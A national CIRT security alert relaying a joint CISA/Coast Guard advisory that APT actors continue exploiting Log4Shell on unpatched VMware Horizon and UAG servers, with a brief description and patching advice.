AL2022_42 Log4Shell is still being exploited by advanced persistent threats (APTs) in VMware products. (28th June 2022)

Description   

The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint Cybersecurity Advisory on June 23, 2022. (CSA). This was released to alert network defenders to Advanced Persistent Threat (APT) actors' continued exploitation of CVE-2021-44228 (Log4Shell) within unpatched VMware Horizon and Unified Access Gateway (UAG) servers. 

Summary 

Log4Shell has been exploited by multiple threat actor groups on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors installed loader malware on compromised systems that contained embedded executables that allowed remote command and control (C2). These Cyber attackers are able to move laterally inside the network and collect and exfiltrate sensitive data in one confirmed compromise. 

How it works 

The CVE-2021-44228 vulnerability allows malicious users to execute arbitrary code on a machine or pod by exploiting a flaw in the log4j library, this is done by sending a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request grants malicious actors' complete control of the affected system. 

Remediation  

The Guyana National CIRT encourages organizations with vulnerable VMware Horizon and UAG systems to update all affected systems to the latest version, Utilize TTPs and IOCs to examine/remediate affected and associated systems. 

The Guyana National CIRT recommends that users and administrations review this alert and apply it where necessary.   

PDF Download: Log4Shell is still being exploited.pdf

References